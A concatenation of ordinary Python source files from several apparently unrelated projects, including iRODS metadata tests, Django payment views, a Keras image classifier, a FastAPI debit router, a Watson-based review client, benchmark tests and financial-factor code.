+ "echo '" + self.rodspw + "' | iinit ; "
+ "imeta add -d '"
+ self.fpath
+ "' '" + self.attrprefix + "archive' 'true'",
shell=True)
self.assertEqual(ret, 0)
self.listavus()
# Remove the protected AVU.
ret = subprocess.call("export irodsUserName='rods'; "
+ "export irodsAuthScheme='password'; "
+ "echo '" + self.rodspw + "' | iinit ; "
+ "imeta rm -d '"
+ self.fpath
+ "' '" + self.attrprefix + "archive' 'true'",
shell=True)
self.assertEqual(ret, 0)
def test_06_disallow_del_archive(self):
"""Prevent deletion of data objects having the archive AVU set."""
# Grant admin write permission on the test file.
ret = subprocess.call("ichmod write rods '"
+ self.fpath
+ "'",
shell=True)
self.assertEqual(ret, 0)
# Add the protected AVU with archive set to true.
ret = subprocess.call("export irodsUserName='rods'; "
+ "export irodsAuthScheme='password'; "
+ "echo '" + self.rodspw + "' | iinit ; "
+ "imeta add -d '"
+ self.fpath
+ "' '" + self.attrprefix + "archive' 'true'",
shell=True)
self.assertEqual(ret, 0)
self.listavus()
# Verify that removal fails.
ret = subprocess.call("irm -f '" + self.fpath + "'", shell=True)
self.assertEqual(ret, 3)
self.listfiles()
# Remove the protected archive attribute.
ret = subprocess.call("export irodsUserName='rods'; "
+ "export irodsAuthScheme='password'; "
+ "echo '" + self.rodspw + "' | iinit ; "
+ "imeta rm -d '"
+ self.fpath
+ "' '" + self.attrprefix + "archive' 'true'",
shell=True)
self.assertEqual(ret, 0)
self.listavus()
if __name__ == '__main__':
unittest.main()
| 2.984375 | 3 |
getpaid/backends/payu/views.py | fizista/django-getpaid | 0 | 12762471 | import logging
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic.base import View
from django.views.generic.detail import DetailView
from getpaid.backends.payu import PaymentProcessor
from getpaid.models import Payment
logger = logging.getLogger('getpaid.backends.payu')
class OnlineView(View):
"""
This View answers on PayU online request that is acknowledge of payment
status change.
The most important logic of this view is delegated to ``PaymentProcessor.online()`` method
"""
def post(self, request, *args, **kwargs):
try:
pos_id = request.POST['pos_id']
session_id = request.POST['session_id']
ts = request.POST['ts']
sig = request.POST['sig']
except KeyError:
logger.warning('Got malformed POST request: %s' % str(request.POST))
return HttpResponse('MALFORMED')
status = PaymentProcessor.online(pos_id, session_id, ts, sig)
return HttpResponse(status)
class SuccessView(DetailView):
"""
This view just redirects to standard backend success link.
"""
model = Payment
def render_to_response(self, context, **response_kwargs):
return HttpResponseRedirect(reverse('getpaid-success-fallback', kwargs={'pk': self.object.pk}))
class FailureView(DetailView):
"""
This view just redirects to standard backend failure link.
"""
model = Payment
def render_to_response(self, context, **response_kwargs):
logger.error("Payment %s failed on backend error %s" % (self.kwargs['pk'], self.kwargs['error']))
return HttpResponseRedirect(reverse('getpaid-failure-fallback', kwargs={'pk': self.object.pk}))
| 2.390625 | 2 |
Classifier.py | Bharathgc/Cat-Vs-Dog-Classifier | 0 | 12762472 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 6 23:45:16 2018
@author: <NAME>
"""
import os
from tqdm import tqdm
import cv2
from keras.models import Sequential
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.preprocessing.image import ImageDataGenerator
import csv
TRAIN_DIR = "./train"
IMG_SIZE = 50
TEST_DIR = "./test/"
def CreateDataset():
counter = 1
for image in tqdm(os.listdir(TRAIN_DIR)):
#get the name cat or dog
label = image.split('.')[-3]
if label == 'cat':
GroundTruth = "cats"
elif label == 'dog':
GroundTruth = "dogs"
path = os.path.join(TRAIN_DIR,image)
#resize the image for 50*50
image = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image,(IMG_SIZE,IMG_SIZE))
#save the image in respective path
cv2.imwrite(r"./training_data/"+GroundTruth+"/"+str(counter)+".jpg",image)
counter += 1
def TestData(model):
TestimageNmber = {}
for image in tqdm(os.listdir(TEST_DIR)):
TestImageFileName = image.split('.')
path = os.path.join(TEST_DIR,image)
testimage = cv2.imread(path)
testimage = cv2.resize(testimage,(50,50))
testimage = testimage.reshape(1,50,50,3)
TestimageNmber[int(TestImageFileName[0])] = model.predict(testimage)[0][0]
return TestimageNmber
def WriteResultsIntoCSV(Results):
Results = dict(sorted(Results.items()))
print("Writing CSV")
with open('results.csv','w',newline="") as csv_file:
writer = csv.writer(csv_file)
for key, value in tqdm(Results.items()):
writer.writerow([key, value])
def TrainModel():
# Initialising the CNN
model = Sequential()
# Convolution
model.add(Conv2D(32, (3, 3), input_shape = (50, 50, 3), activation = 'relu'))
# Pooling
model.add(MaxPooling2D(pool_size = (2, 2)))
# Second convolutional layer
model.add(Conv2D(32, (3, 3), activation = 'relu'))
model.add(MaxPooling2D(pool_size = (2, 2)))
# Flattening
model.add(Flatten())
# Full connection
model.add(Dense(units = 128, activation = 'relu'))
model.add(Dense(units = 1, activation = 'sigmoid'))
# Compiling the CNN
model.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
train_datagen = ImageDataGenerator(rescale = 1./255,shear_range = 0.2,zoom_range = 0.2,horizontal_flip = True)
#test_datagen = ImageDataGenerator(rescale = 1./255)
training_set = train_datagen.flow_from_directory('training_data',target_size = (50, 50),batch_size = 32,class_mode = 'binary')
model.fit_generator(training_set,steps_per_epoch = 8000,epochs = 25, validation_steps = 2000)
print("Model Training Done")
return model
if __name__ == '__main__':
#Normalize resize the image and seperate the training data
#CreateDataset()
#Train the model
print("Training the Model")
model = TrainModel()
print("Testing the Model")
Results = TestData(model)
WriteResultsIntoCSV(Results)
| 2.78125 | 3 |
tests/appsec/test_PII.py | DataDog/system-tests | 3 | 12762473 | # Unless explicitly stated otherwise all files in this repository are licensed under the the Apache License Version 2.0.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2021 Datadog, Inc.
from utils import BaseTestCase, context, released, interfaces, coverage
import pytest
if context.library == "cpp":
pytestmark = pytest.mark.skip("not relevant")
@released(golang="?", dotnet="?", java="?", nodejs="?", php="?", python="?", ruby="?")
@coverage.not_implemented
class Test_Scrubbing(BaseTestCase):
"""Appsec scrubs all sensitive data"""
| 1.625 | 2 |
autoencoder/baseline/doc2vec.py | hugochan/K-Competitive-Autoencoder-for-Text-Analytics | 133 | 12762474 | '''
Created on Jan, 2017
@author: hugo
'''
from __future__ import absolute_import
import multiprocessing
from gensim.models import Doc2Vec
class MyDoc2Vec(object):
def __init__(self, dim, hs=0, window=5, negative=5, epoches=5, dm=1, dm_concat=1):
super(MyDoc2Vec, self).__init__()
self.dim = dim
self.hs = hs
self.window = window
self.negative = negative
self.epoches = epoches
self.dm = dm
self.dm_concat = dm_concat
def train(self, corpus):
self.model = Doc2Vec(min_count=1, window=self.window, size=self.dim, \
workers=multiprocessing.cpu_count(), hs=self.hs,\
negative=self.negative, iter=1, dm=self.dm, dm_concat=self.dm_concat)
self.model.build_vocab(corpus())
for each in range(self.epoches):
self.model.train(corpus())
return self
def predict(model, corpus):
doc_codes = {}
for doc_words, doc_name in corpus():
doc_codes[doc_name[0]] = model.infer_vector(doc_words).tolist()
return doc_codes
def save_doc2vec(model, outfile):
model.save(outfile)
def load_doc2vec(mod_file):
return Doc2Vec.load(mod_file)
| 2.453125 | 2 |
backend/app/api/api_v1/routes/debits.py | ralphribeiro/debito_automatico | 0 | 12762475 | from enum import Enum
from typing import Any
from app.schemas.debit import DebitCreate, DebitUpdate
from fastapi import APIRouter, Depends, HTTPException
from fastapi import status as sts
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.celery_app import celery_app
router = APIRouter()
class StatusRequest(str, Enum):
canceled = "canceled"
approved = "approved"
rejected = "rejected"
@router.get("/request", response_model=schemas.Debit)
async def get_automatic_debit_request(
db: Session = Depends(deps.get_db),
current_user: models.User = Depends(deps.get_current_active_user)
) -> Any:
"""
Request Automatic Debit.
"""
debit = crud.debit.get_by_owner(db, owner_id=current_user.id)
if debit:
raise HTTPException(status_code=sts.HTTP_400_BAD_REQUEST,
detail="Automatic debit request already made.")
obj_in = DebitCreate()
return crud.debit.create_with_owner(db, obj_in=obj_in,
owner_id=current_user.id)
@router.put("/{owner_id}", response_model=schemas.Debit)
async def update_status(
owner_id: int,
status: StatusRequest,
db: Session = Depends(deps.get_db),
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Update Automatic Debit Status.
"""
debit = crud.debit.get_by_owner(db, owner_id=owner_id)
if not debit:
raise HTTPException(status_code=sts.HTTP_404_NOT_FOUND,
detail="Not Found automatic debit request by id")
obj_in = DebitUpdate(status=status)
debit_out = crud.debit.update_status(db, db_obj=debit, obj_in=obj_in)
if status in (StatusRequest.canceled, StatusRequest.approved):
user = crud.user.get(db, id=debit.owner_id)
celery_app.send_task("app.tasks.send_email.email_task",
args=[status, user.email])
return debit_out
@router.get("/{owner_id}", response_model=schemas.Debit)
async def get_automatic_debit_by_owner_id(
owner_id: int,
db: Session = Depends(deps.get_db),
current_user: models.User = Depends(deps.get_current_active_user)
) -> Any:
"""
Get Automatic Debit By Owner Id.
"""
debit = crud.debit.get_by_owner(db, owner_id=owner_id)
if not debit:
raise HTTPException(status_code=sts.HTTP_404_NOT_FOUND,
detail="Automatic debit request not found.")
return debit
| 2.21875 | 2 |
server/djangoapp/restapis.py | jeetgor/agfzb-CloudAppDevelopment_Capstone | 0 | 12762476 | <gh_stars>0
import requests
import json
# import related models here
from requests.auth import HTTPBasicAuth
from .models import CarDealer, DealerReview
# Create a `get_request` to make HTTP GET requests
# e.g., response = requests.get(url, params=params, headers={'Content-Type': 'application/json'},
# auth=HTTPBasicAuth('apikey', api_key))
def get_request(url, **kwargs):
print(kwargs)
print("GET from {} ".format(url))
try:
# Call get method of requests library with URL and parameters
api_key = kwargs.get("api_key", None)
if api_key:
# Basic authentication GET
response = requests.get(url, headers={'Content-Type': 'application/json'},
params=kwargs, auth=HTTPBasicAuth('apikey', api_key))
else:
# no authentication GET
response = requests.get(url, headers={'Content-Type': 'application/json'},
params=kwargs)
status_code = response.status_code
print("With status {} ".format(status_code))
json_data = json.loads(response.text)
return json_data
except:
# If any error occurs
print("Network exception occurred")
# Create a `post_request` to make HTTP POST requests
# e.g., response = requests.post(url, params=kwargs, json=payload)
def post_request(url, json_payload, **kwargs):
""" Post"""
try:
response = requests.post(url, json=json_payload, params=kwargs)
except:
print("Network exception occurred")
json_data = json.loads(response.text)
return json_data
# Create a get_dealers_from_cf method to get dealers from a cloud function
def get_dealers_from_cf(url, **kwargs):
results = []
# Call get_request with a URL parameter
json_result = get_request(url)
if json_result:
# Get the row list in JSON as dealers
dealers = json_result["entries"]
# For each dealer object
for dealer_doc in dealers:
# Get its content in `doc` object
# dealer_doc = dealer["doc"]
# Create a CarDealer object with values in `doc` object
dealer_obj = CarDealer(
address=dealer_doc["address"],
city=dealer_doc["city"],
full_name=dealer_doc["full_name"],
id=dealer_doc["id"],
lat=dealer_doc["lat"],
long=dealer_doc["long"],
short_name=dealer_doc["short_name"],
st=dealer_doc["st"],
zip=dealer_doc["zip"],
state=dealer_doc['state']
)
results.append(dealer_obj)
return results
# Create a get_dealer_reviews_from_cf method to get reviews by dealer id from a cloud function
def get_dealer_reviews_from_cf(url, **kwargs):
""" Get Reviews"""
results = []
json_result = get_request(url)
if json_result:
reviews = json_result["entries"]
for review in reviews:
dealer_review = DealerReview(id=review["id"],
name=review["name"],
dealership=review["dealership"],
review=review["review"],
purchase=review["purchase"],
purchase_date=review["purchase_date"],
car_make=review["car_make"],
car_model=review["car_model"],
car_year=review["car_year"],
sentiment=analyze_review_sentiments(review.get("review", "")))
results.append(dealer_review)
return results
def add_dealer_review_to_db(review_post):
""" Add Review """
review = {
"id": review_post['review_id'],
"name": review_post['reviewer_name'],
"dealership": review_post['dealership'],
"review": review_post['review'],
"purchase": review_post.get('purchase', False),
"purchase_date": review_post.get('purchase_date'),
"car_make": review_post.get('car_make'),
"car_model": review_post.get('car_model'),
"car_year": review_post.get('car_year')
}
return post_request('https://06e36d79.us-south.apigw.appdomain.cloud/api/review-post', review)
# Create an `analyze_review_sentiments` method to call Watson NLU and analyze text
def analyze_review_sentiments(text):
# - Call get_request() with specified arguments
# - Get the returned sentiment label such as Positive or Negative
# Natural language understanding url
NLU_API_KEY = "<KEY>"
# Call get_request with a URL parameter
json_result = get_request("https://api.eu-gb.natural-language-understanding.watson.cloud.ibm.com/instances/817c5ca5-adff-4b02-a2fe-8810bae23791/v1/analyze",
api_key=NLU_API_KEY,
text=text,
version="2021-08-01",
features= {
"sentiment": {},
},
return_analyzed_text=True)
if json_result and "sentiment" in json_result:
sentiment = json_result["sentiment"]["document"]["label"]
return sentiment | 2.625 | 3 |
lab/square_roots.py | Blahodatny/lab2 | 1 | 12762477 | <reponame>Blahodatny/lab2
import math
from termcolor import colored
from ui import UI
class SquareRoots:
def __init__(self, matrix, n, eps):
self.matrix = matrix
self.n = n
self.eps = eps
self.u_matrix = []
self.ut_matrix = []
p = colored('SQUARE ROOTS', 'green')
print(p)
self.get_u()
self.x = self.get_roots()
self.determinant = self.get_determinant()
self.reverse = self.get_reverse()
def get_u(self):
for k in range(self.n):
self.u_matrix.append([0] * self.n)
self.ut_matrix.append([0] * self.n)
for i in range(self.n):
for j in range(self.n):
if i == j:
m = 0
for k in range(i):
m = m + pow(self.u_matrix[k][i], 2)
print('u(', i, ', ', j, ') = sqrt(', self.matrix[i][i], ' - ', m, ') = ', end='')
self.u_matrix[i][i] = math.sqrt(self.matrix[i][i] - m)
print(self.u_matrix[i][j])
if i < j:
m = 0
for k in range(i):
m = m + self.u_matrix[k][i] * self.u_matrix[k][j]
print('u(', i, ', ', j, ') = (', self.matrix[i][j], ' - ', m, ') / ', self.u_matrix[i][i], ' = ',
end='')
self.u_matrix[i][j] = (self.matrix[i][j] - m) / self.u_matrix[i][i]
print(self.u_matrix[i][j])
if i > j:
self.u_matrix[i][j] = 0
print('u(', i, ', ', j, ') = 0')
self.ut_matrix[j][i] = self.u_matrix[i][j]
print()
print('U-matrix:')
UI.print_matrix(self.u_matrix, self.n)
print()
print('U^T-matrix:')
UI.print_matrix(self.ut_matrix, self.n)
print()
def get_roots(self):
print('calculating roots')
y = [0] * self.n
x = [0] * self.n
for i in range(self.n):
m = 0
for k in range(0, i):
m = m + self.ut_matrix[i][k] * y[k]
y[i] = (self.matrix[i][self.n] - m) / self.ut_matrix[i][i]
print('y[', i, '] = (', self.matrix[i][self.n], ' - ', m, ') / ', self.ut_matrix[i][i], ' = ', y[i])
print()
for i in range(self.n - 1, -1, -1):
m = 0
for k in range(i + 1, self.n):
m = m + self.u_matrix[i][k] * x[k]
x[i] = (y[i] - m) / self.u_matrix[i][i]
print('x[', i, '] = ', y[i], ' - ', m, ' = ', x[i])
x[i] = round(x[i], len(str(self.eps)))
print()
r = colored('Roots:', 'green')
print(r)
for i in range(self.n):
print('x[', i + 1, '] = ', x[i])
print()
return x
def get_determinant(self):
det = 1
for i in range(self.n):
det = det * self.u_matrix[i][i]
det = pow(det, 2)
det = round(det, len(str(self.eps)))
r = colored('Determinant', 'green')
print(r, end=' ')
print(' = ', det)
print()
return det
def get_reverse(self):
reverse = []
for i in range(self.n):
reverse.append([0] * self.n)
for j in range(self.n - 1, -1, -1):
for i in range(j, -1, -1):
if j == i:
m = 0
for k in range(i + 1, self.n):
m = m + self.u_matrix[i][k] * self.ut_matrix[i][k]
reverse[i][i] = ((1 / self.u_matrix[i][i]) - m) / self.u_matrix[i][i]
else:
m = 0
for k in range(i + 1, self.n):
m = m + self.u_matrix[i][k] * self.ut_matrix[k][j]
reverse[i][j] = -m / self.u_matrix[i][i]
reverse[j][i] = reverse[i][j]
print('Reverse matrix:')
UI.print_matrix(reverse, self.n)
print()
return reverse
| 3.421875 | 3 |
autox/autox_server/model/lgb_with_fe.py | fanghy06/AutoX | 499 | 12762478 | import warnings
warnings.filterwarnings('ignore')
from autox.autox_server.model import model_util
def lgb_with_fe(G_df_dict, G_data_info, G_hist, is_train, remain_time, params, lgb_para_dict, data_name, exp_name):
remain_time = model_util.lgb_model(G_df_dict['BIG_FE'], G_data_info, G_hist, is_train, remain_time, exp_name, params,
lgb_para_dict, data_name)
return remain_time | 2.09375 | 2 |
pymove/utils/trajectories.py | safarzadeh-reza/PyMove | 1 | 12762479 | <reponame>safarzadeh-reza/PyMove
"""
Data operations.
read_csv,
invert_dict,
flatten_dict,
flatten_columns,
shift,
fill_list_with_new_values,
object_for_array,
column_to_array
"""
from itertools import chain
from typing import Any, Dict, List, Optional, Text, Union
import numpy as np
from numpy import ndarray
from pandas import DataFrame, Series
from pandas import read_csv as _read_csv
from pandas._typing import FilePathOrBuffer
from pymove.core.dataframe import MoveDataFrame
from pymove.utils.constants import DATETIME, LATITUDE, LONGITUDE, TRAJ_ID, TYPE_PANDAS
from pymove.utils.math import is_number
def read_csv(
filepath_or_buffer: FilePathOrBuffer,
latitude: Optional[Text] = LATITUDE,
longitude: Optional[Text] = LONGITUDE,
datetime: Optional[Text] = DATETIME,
traj_id: Optional[Text] = TRAJ_ID,
type_: Optional[Text] = TYPE_PANDAS,
n_partitions: Optional[int] = 1,
**kwargs
):
"""
Reads a `csv` file and structures the data.
Parameters
----------
filepath_or_buffer : str or path object or file-like object
Any valid string path is acceptable. The string could be a URL.
Valid URL schemes include http, ftp, s3, gs, and file.
For file URLs, a host is expected.
A local file could be: file://localhost/path/to/table.csv.
If you want to pass in a path object, pandas accepts any os.PathLike.
By file-like object, we refer to objects with a read() method,
such as a file handle (e.g. via builtin open function) or StringIO.
latitude : str, optional
Represents the column name of feature latitude, by default 'lat'
longitude : str, optional
Represents the column name of feature longitude, by default 'lon'
datetime : str, optional
Represents the column name of feature datetime, by default 'datetime'
traj_id : str, optional
Represents the column name of feature id trajectory, by default 'id'
type_ : str, optional
Represents the type of the MoveDataFrame, by default 'pandas'
n_partitions : int, optional
Represents number of partitions for DaskMoveDataFrame, by default 1
**kwargs : Pandas read_csv arguments
https://pandas.pydata.org/docs/reference/api/pandas.read_csv.html?highlight=read_csv#pandas.read_csv
Returns
-------
MoveDataFrameAbstract subclass
Trajectory data
"""
data = _read_csv(
filepath_or_buffer,
**kwargs
)
return MoveDataFrame(
data, latitude, longitude, datetime, traj_id, type_, n_partitions
)
def invert_dict(d: Dict) -> Dict:
"""
Inverts the key:value relation of a dictionary.
Parameters
----------
d : dict
dictionary to be inverted
Returns
-------
dict
inverted dict
"""
return {v: k for k, v in d.items()}
def flatten_dict(
d: Dict, parent_key: Optional[Text] = '', sep: Optional[Text] = '_'
) -> Dict:
"""
Flattens a nested dictionary.
Parameters
----------
d: dict
Dictionary to be flattened
parent_key: str, optional
Key of the parent dictionary, by default ''
sep: str, optional
Separator for the parent and child keys, by default '_'
Returns
-------
dict
Flattened dictionary
References
----------
https://stackoverflow.com/questions/6027558/flatten-nested-dictionaries-compressing-keys
Examples
--------
>>> d = { 'a': 1, 'b': { 'c': 2, 'd': 3}}
>>> flatten_dict(d)
{ 'a': 1, 'b_c': 2, 'b_d': 3 }
"""
if not isinstance(d, dict):
return {parent_key: d}
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, dict):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def flatten_columns(data: DataFrame, columns: List) -> DataFrame:
"""
Transforms columns containing dictionaries in individual columns.
Parameters
----------
data: DataFrame
Dataframe with columns to be flattened
columns: list
List of columns from dataframe containing dictionaries
Returns
-------
dataframe
Dataframe with the new columns from the flattened dictionary columns
References
----------
https://stackoverflow.com/questions/51698540/import-nested-mongodb-to-pandas
Examples
--------
>>> d = {'a': 1, 'b': {'c': 2, 'd': 3}}
>>>> data = pd.DataFrame({'col1': [1], 'col2': [d]})
>>>> flatten_columns(data, ['col2'])
col1 col2_b_d col2_a col2_b_c
0 1 3 1 2
"""
data = data.copy()
if not isinstance(columns, list):
columns = [columns]
for col in columns:
data[f'{col}_'] = data[f'{col}'].apply(flatten_dict)
keys = set(chain(*data[f'{col}_'].apply(lambda column: column.keys())))
for key in keys:
column_name = f'{col}_{key}'.lower()
data[column_name] = data[f'{col}_'].apply(
lambda cell: cell[key] if key in cell.keys() else np.NaN
)
cols_to_drop = [(f'{col}', f'{col}_') for col in columns]
return data.drop(columns=list(chain(*cols_to_drop)))
def shift(
arr: Union[List, Series, ndarray],
num: int,
fill_value: Optional[Any] = None
) -> ndarray:
"""
Shifts the elements of the given array by the number of periods specified.
Parameters
----------
arr : array
The array to be shifted
num : int
Number of periods to shift. Can be positive or negative
If positive, the elements will be pulled down, and pulled up otherwise
fill_value : float, optional
The scalar value used for newly introduced missing values, by default np.nan
Returns
-------
array
A new array with the same shape and type_ as the initial given array,
but with the indexes shifted.
Notes
-----
Similar to pandas shift, but faster.
References
----------
https://stackoverflow.com/questions/30399534/shift-elements-in-a-numpy-array
"""
result = np.empty_like(arr)
if fill_value is None:
dtype = result.dtype
if np.issubdtype(dtype, np.bool_):
fill_value = False
elif np.issubdtype(dtype, np.integer):
fill_value = 0
else:
fill_value = np.nan
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
def fill_list_with_new_values(original_list: List, new_list_values: List):
"""
Copies elements from one list to another.
The elements will be positioned in
the same position in the new list as they were in their original list.
Parameters
----------
original_list : list.
The list to which the elements will be copied
new_list_values : list.
The list from which elements will be copied
"""
n = len(new_list_values)
original_list[:n] = new_list_values
def object_for_array(object_: Text) -> ndarray:
"""
Transforms an object into an array.
Parameters
----------
object : str
object representing a list of integers or strings
Returns
-------
array
object converted to a list
"""
if object_ is None:
return object_
conv = np.array([*map(str.strip, object_[1:-1].split(','))])
if is_number(conv[0]):
return conv.astype(np.float32)
else:
return conv.astype('object_')
def column_to_array(data: DataFrame, column: Text):
"""
Transforms all columns values to list.
Parameters
----------
data : dataframe
The input trajectory data
column : str
Label of data referring to the column for conversion
"""
data = data.copy()
if column not in data:
raise KeyError(
'Dataframe must contain a %s column' % column
)
data[column] = data[column].apply(object_for_array)
return data
| 3.265625 | 3 |
tests/benchmarks/micro_benchmarks/test_micro_base.py | yangpanMS/superbenchmark | 59 | 12762480 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Tests for MicroBenchmark and MicroBenchmarkWithInvoke modules."""
import os
import re
import shutil
from superbench.benchmarks import BenchmarkType, ReturnCode
from superbench.benchmarks.micro_benchmarks import MicroBenchmark, MicroBenchmarkWithInvoke
class FakeMicroBenchmark(MicroBenchmark):
"""Fake benchmark inherit from MicroBenchmark."""
def __init__(self, name, parameters=''):
"""Constructor.
Args:
name: benchmark name.
parameters: benchmark parameters.
"""
super().__init__(name, parameters)
def _benchmark(self):
"""Implementation for benchmarking.
Return:
True if run benchmark successfully.
"""
return True
class FakeMicroBenchmarkWithInvoke(MicroBenchmarkWithInvoke):
"""Fake benchmark inherit from MicroBenchmarkWithInvoke."""
def __init__(self, name, parameters=''):
"""Constructor.
Args:
name: benchmark name.
parameters: benchmark parameters.
"""
super().__init__(name, parameters)
def _preprocess(self):
"""Preprocess/preparation operations before the benchmarking.
Return:
True if _preprocess() succeed.
"""
if not super()._preprocess():
return False
command = os.path.join(self._args.bin_dir, self._bin_name)
command += " -n 'cost1: 10.2, cost2: 20.2'"
self._commands.append(command)
return True
def _process_raw_result(self, cmd_idx, raw_output):
"""Function to process raw results and save the summarized results.
self._result.add_raw_data() and self._result.add_result() need to be called to save the results.
Args:
cmd_idx (int): the index of command corresponding with the raw_output.
raw_output (str): raw output string of the micro-benchmark.
Return:
True if the raw output string is valid and result can be extracted.
"""
self._result.add_raw_data('raw_output_' + str(cmd_idx), raw_output)
pattern = r'\d+\.\d+'
result = re.findall(pattern, raw_output)
if len(result) != 2:
return False
try:
result = [float(item) for item in result]
except BaseException:
return False
self._result.add_result('cost1', result[0])
self._result.add_result('cost2', result[1])
return True
def test_micro_benchmark_base():
"""Test MicroBenchmark."""
benchmark = FakeMicroBenchmark('fake')
assert (benchmark._benchmark_type == BenchmarkType.MICRO)
assert (benchmark.run())
assert (benchmark.return_code == ReturnCode.SUCCESS)
benchmark._process_numeric_result('metric1', [1, 2, 3, 4, 5, 6])
assert (benchmark.result['metric1'] == [3.5])
assert (benchmark.raw_data['metric1'] == [[1, 2, 3, 4, 5, 6]])
def test_micro_benchmark_with_invoke_base():
"""Test MicroBenchmarkWithInvoke."""
# Negative case - MICROBENCHMARK_BINARY_NAME_NOT_SET.
benchmark = FakeMicroBenchmarkWithInvoke('fake')
assert (benchmark._benchmark_type == BenchmarkType.MICRO)
assert (benchmark.run() is False)
assert (benchmark.return_code == ReturnCode.MICROBENCHMARK_BINARY_NAME_NOT_SET)
# Negative case - MICROBENCHMARK_BINARY_NOT_EXIST.
benchmark = FakeMicroBenchmarkWithInvoke('fake')
benchmark._bin_name = 'not_existed_binary'
assert (benchmark.run() is False)
assert (benchmark.return_code == ReturnCode.MICROBENCHMARK_BINARY_NOT_EXIST)
# Positive case.
benchmark = FakeMicroBenchmarkWithInvoke('fake')
benchmark._bin_name = 'echo'
assert (benchmark.run())
assert (benchmark.return_code == ReturnCode.SUCCESS)
assert (os.path.join(benchmark._args.bin_dir, benchmark._bin_name) == shutil.which(benchmark._bin_name))
assert (benchmark._commands[0] == (shutil.which(benchmark._bin_name) + " -n 'cost1: 10.2, cost2: 20.2'"))
assert (benchmark.raw_data['raw_output_0'] == ['cost1: 10.2, cost2: 20.2'])
assert (benchmark.result['cost1'] == [10.2])
assert (benchmark.result['cost2'] == [20.2])
| 2.59375 | 3 |
financial/calc_engines/factor_earning_cal.py | wangjiehui11235/panther | 0 | 12762481 | # -*- coding: utf-8 -*-
import pdb,importlib,inspect,time,datetime,json
# from PyFin.api import advanceDateByCalendar
# from data.polymerize import DBPolymerize
from data.storage_engine import StorageEngine
import time
import pandas as pd
import numpy as np
from datetime import timedelta, datetime
from financial import factor_earning
from data.model import BalanceMRQ, BalanceTTM, BalanceReport
from data.model import CashFlowTTM, CashFlowReport
from data.model import IndicatorReport
from data.model import IncomeReport, IncomeTTM
from vision.db.signletion_engine import *
from data.sqlengine import sqlEngine
# pd.set_option('display.max_columns', None)
# pd.set_option('display.max_rows', None)
# from ultron.cluster.invoke.cache_data import cache_data
class CalcEngine(object):
def __init__(self, name, url, methods=[{'packet':'financial.factor_earning','class':'FactorEarning'},]):
self._name = name
self._methods = methods
self._url = url
def get_trade_date(self, trade_date, n, days=365):
"""
获取当前时间前n年的时间点,且为交易日,如果非交易日,则往前提取最近的一天。
:param days:
:param trade_date: 当前交易日
:param n:
:return:
"""
syn_util = SyncUtil()
trade_date_sets = syn_util.get_all_trades('001002', '19900101', trade_date)
trade_date_sets = trade_date_sets['TRADEDATE'].values
time_array = datetime.strptime(str(trade_date), "%Y%m%d")
time_array = time_array - timedelta(days=days) * n
date_time = int(datetime.strftime(time_array, "%Y%m%d"))
if str(date_time) < min(trade_date_sets):
# print('date_time %s is out of trade_date_sets' % date_time)
return str(date_time)
else:
while str(date_time) not in trade_date_sets:
date_time = date_time - 1
# print('trade_date pre %s year %s' % (n, date_time))
return str(date_time)
def _func_sets(self, method):
# 私有函数和保护函数过滤
return list(filter(lambda x: not x.startswith('_') and callable(getattr(method,x)), dir(method)))
def loading_data(self, trade_date):
"""
获取基础数据
按天获取当天交易日所有股票的基础数据
:param trade_date: 交易日
:return:
"""
# 转换时间格式
time_array = datetime.strptime(trade_date, "%Y-%m-%d")
trade_date = datetime.strftime(time_array, '%Y%m%d')
# 读取目前涉及到的因子
trade_date_pre_year = self.get_trade_date(trade_date, 1)
trade_date_pre_year_2 = self.get_trade_date(trade_date, 2)
trade_date_pre_year_3 = self.get_trade_date(trade_date, 3)
trade_date_pre_year_4 = self.get_trade_date(trade_date, 4)
trade_date_pre_year_5 = self.get_trade_date(trade_date, 5)
engine = sqlEngine()
columns = ['COMPCODE', 'PUBLISHDATE', 'ENDDATE', 'symbol', 'company_id', 'trade_date']
# Report Data
cash_flow_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowReport,
[CashFlowReport.LABORGETCASH,
CashFlowReport.FINALCASHBALA,
], dates=[trade_date])
for column in columns:
if column in list(cash_flow_sets.keys()):
cash_flow_sets = cash_flow_sets.drop(column, axis=1)
cash_flow_sets = cash_flow_sets.rename(
columns={'LABORGETCASH': 'goods_sale_and_service_render_cash', # 销售商品、提供劳务收到的现金
'FINALCASHBALA': 'cash_and_equivalents_at_end', # 期末现金及现金等价物余额
})
income_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.BIZTOTINCO,
IncomeReport.BIZINCO,
IncomeReport.PERPROFIT,
IncomeReport.PARENETP,
IncomeReport.NETPROFIT,
], dates=[trade_date])
for column in columns:
if column in list(income_sets.keys()):
income_sets = income_sets.drop(column, axis=1)
income_sets = income_sets.rename(columns={'NETPROFIT': 'net_profit', # 净利润
'BIZTOTINCO': 'total_operating_revenue', # 营业总收入
'BIZINCO': 'operating_revenue', # 营业收入
'PERPROFIT': 'operating_profit', # 营业利润
'PARENETP': 'np_parent_company_owners', # 归属于母公司所有者的净利润
})
indicator_sets = engine.fetch_fundamentals_pit_extend_company_id(IndicatorReport,
[
IndicatorReport.NETPROFITCUT,
# 扣除非经常损益后的净利润
IndicatorReport.MGTEXPRT
], dates=[trade_date])
for column in columns:
if column in list(indicator_sets.keys()):
indicator_sets = indicator_sets.drop(column, axis=1)
indicator_sets = indicator_sets.rename(columns={'NETPROFITCUT': 'adjusted_profit', # 扣除非经常损益后的净利润
})
